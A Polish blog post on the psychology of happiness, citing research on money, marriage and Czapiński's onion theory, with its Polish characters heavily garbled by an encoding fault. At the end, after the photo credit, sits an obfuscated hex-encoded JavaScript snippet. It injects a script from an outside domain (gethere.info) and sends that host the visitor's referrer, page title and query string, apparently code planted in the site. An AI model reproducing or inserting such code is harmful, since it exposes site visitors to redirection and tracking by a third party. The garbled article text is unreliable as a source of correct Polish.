Gdzie znaleA?A� szczA�A�cie?

opublikowane w Najnowsze Wpisy, Psychologia | 0

Pewnie niewielu z nas moA?e powiedzieA�, A?e jesteA�my bezwzglA�dnie szczA�A�liwi, A?e niczego nam nie brakuje. Stale za czymA� gonimy, wydaje nam siA�, A?e gdybyA�my jeszcze tylko mieli trochA� wiA�cej pieniA�dzy, lepszA� pracA� czy tego wymarzonego partnera, to osiA�gnA�libyA�my peA�niA� szczA�A�cia. Jednak kiedy dostajemy juA? to, czego chcemy, okazuje siA�, A?e to nie do koA�ca to… I tak bez koA�ca. MoA?e wiA�c chcemy zawsze tego, czego akurat nie mamy? A moA?e w A?yciu chodzi wA�aA�nie o to, A?eby goniA� krA?liczka?

Badania pokazujA�, A?e Polacy niestety nie sA� zbyt szczA�A�liwym narodem. DuA?A� satysfakcjA� z A?ycia ma tylko 15% z nas. To niewiele w porA?wnaniu np. z DaniA� czy HolandiA�. A szkoda, bo jak mA?wi psycholog Sonja Lyubomirsky, szczA�A�cie jest najbardziej znaczA�cym wymiarem ludzkiego doA�wiadczenia i A?ycia emocjonalnego poniewaA? przyczynia siA� do lepszego funkcjonowania ludzi. Badania pokazujA�, A?e korzyA�ci jakie niesie za sobA� szczA�A�cie obejmujA�: wyA?szy dochA?d, wiA�kszA� wydajnoA�A� pracy, wiA�ksze wsparcie spoA�eczne, bardziej satysfakcjonujA�ce i trwalsze zwiA�zki, efektywniejsze relacje interpersonalne, wyA?szy poziom energii, lepsze zdrowie, a nawet dA�uA?sze A?ycie. Osoby szczA�A�liwe sA� bardziej twA?rcze, pomocne, pewne siebie, lepiej radzA� sobie ze stresem i trudnoA�ciami A?yciowymi.

Co zatem decyduje o szczA�A�ciu? PieniA�dze? Nie bardzo. Badania potwierdzajA� sA�usznoA�A� przysA�owia, A?eA�pieniA�dze wcale szczA�A�cia nie dajA�. Profesor Daniel Kahneman, laureat Nagrody Nobla w dziedzinie ekonomii, udowodniA�, A?e wyA?sza pensja nie przynosi szczA�A�cia. Badania przeprowadzone w latach 70. pokazaA�y, A?e Amerykanom, ktA?rzy wygrali na loterii, wcale nie wzrosA�o poczucie satysfakcji A?yciowej. OczywiA�cie sama wygrana daje ogromnA� radoA�A�, ale tylko chwilowA�. Potem poziom szczA�A�cia wraca do normy. Co wiA�cej, podobno bogaci ludzie odczuwajA� mniejszA� przyjemnoA�A� z codziennych zdarzeA� niA? zwyczajni A�miertelnicy.

TrochA� lepiej jest w przypadku maA�A?eA�stwa. Nie jest ono co prawda gwarantem szczA�A�cia, ale jednak zwiA�ksza satysfakcjA� A?yciowA� trochA� bardziej niA? pieniA�dze. ChoA� teA? raczej u mA�A?czyzn niA? u kobiet. Badania pokazujA�, A?e osoby po A�lubie deklarujA� wiA�kszA� A?yciowA� satysfakcjA�, ale teA? lepiej sypiajA� i rzadziej wpadajA� w depresjA�. MogA�oby siA� wydawaA�, A?e pary A?yjA�ce bez A�lubu bA�dA� czerpaA� podobne korzyA�ci, jednak okazaA�o siA�, A?e tak nie jest. Badacze z Australii przebadali 38 tys. osA?b i wykazali, A?e konkubenci deklarujA� A�rednio 4 do 12 proc. niA?szy poziom zadowolenia z A?ycia od osA?b z obrA�czkA� na palcu. TA�umaczone jest to tym, A?e para w formalnym zwiA�zku ma poczucie wiA�kszego zaangaA?owania i dA�ugoterminowego oddania niA? A?yjA�ca na tak zwanA� kociA� A�apA�.

Cebulowa teoria szczA�A�cia Janusza CzapiA�skiego mA?wi o tym, A?e szczA�A�cie nie jest jednowymiarowe, lecz stanowi strukturA� zA�oA?onA� z trzech warstw: zewnA�trznej, czyli satysfakcja z rA?A?nych dziedzin A?ycia takich jak zadowolenie ze zwiA�zku, dzieci czy pracy; warstwa druga to dobrostan subiektywny, czyli ogA?lne poczucie satysfakcji z A?ycia oraz warstwa trzecia, najgA�A�bsza to wola A?ycia. NajwaA?niejsza jest oczywiA�cie ta trzecia warstwa, bowiem wola A?ycia nie zanika nawet w najgorszych warunkach, moA?e jedynie ulec chwilowemu obniA?eniu, po czym siA� odbudowuje. Cebulowa teoria szczA�A�cia zakA�ada, A?e warunki A?yciowe najsilniej wpA�ywajA� na drobne satysfakcje z poszczegA?lnych dziedzin A?ycia, sA�abiej na ogA?lny dobrostan, najsA�abiej zaA� na wolA� A?ycia.

Tak wiA�c nasze szczA�A�cie nie zaleA?y wcale od obiektywnej jakoA�ci A?ycia. Nie zaleA?y teA? od iloA�ci posiadanych pieniA�dzy. WedA�ug psychologa Bogdana Wojciszke, jedynym warunkiem zewnA�trznym niezbA�dnym do szczA�A�cia jest dobra jakoA�A� wiA�zi z innymi ludA?mi. CaA�a reszta czynnikA?w warunkujA�cych szczA�A�cie jest wewnA�trz nas – sA� to cechy osobowoA�ciowe i nasza wola A?ycia. OdpowiedA? na pytanie, gdzie znaleA?A� szczA�A�cie okazuje siA� prosta – w sobie! Trzeba tylko zaczA�A� dobrze szukaA�.

ZdjA�cie: www.bakusiowo.pl


 var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}